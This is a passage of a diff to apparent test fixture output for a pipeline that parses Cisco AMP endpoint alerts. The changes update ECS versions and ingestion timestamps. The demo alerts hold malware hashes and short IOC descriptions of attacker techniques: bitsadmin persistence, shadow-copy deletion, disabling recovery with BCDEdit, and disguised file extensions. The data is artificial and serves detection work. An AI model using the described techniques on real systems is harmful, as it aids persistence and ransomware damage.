                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6533243623469744000",
                 "kind": "alert"
@@ -159,7 +159,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -191,7 +191,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701339869Z",
+                "ingested": "2021-09-13T18:06:29.783721500Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -248,7 +248,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -268,7 +268,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701341785Z",
+                "ingested": "2021-09-13T18:06:29.783723655Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -319,7 +319,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -339,7 +339,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701343742Z",
+                "ingested": "2021-09-13T18:06:29.783725794Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -407,7 +407,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -439,7 +439,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701345707Z",
+                "ingested": "2021-09-13T18:06:29.783727990Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -507,7 +507,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -537,7 +537,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701347645Z",
+                "ingested": "2021-09-13T18:06:29.783730076Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -594,7 +594,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -614,7 +614,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701349558Z",
+                "ingested": "2021-09-13T18:06:29.783732206Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -672,7 +672,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -692,7 +692,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701351457Z",
+                "ingested": "2021-09-13T18:06:29.783734294Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -758,7 +758,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -778,7 +778,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701353384Z",
+                "ingested": "2021-09-13T18:06:29.783736424Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -844,7 +844,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -864,7 +864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701355274Z",
+                "ingested": "2021-09-13T18:06:29.783738503Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -930,7 +930,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -950,7 +950,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701357412Z",
+                "ingested": "2021-09-13T18:06:29.783740861Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:56.000Z",
@@ -1016,7 +1016,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1036,7 +1036,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:32:35.701359314Z",
+                "ingested": "2021-09-13T18:06:29.783742934Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:49.000Z",
@@ -1102,7 +1102,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1122,7 +1122,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701361216Z",
+                "ingested": "2021-09-13T18:06:29.783745003Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:03:40.000Z",
@@ -1182,7 +1182,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1203,7 +1203,7 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-12T17:32:35.701363103Z",
+                "ingested": "2021-09-13T18:06:29.783747078Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not 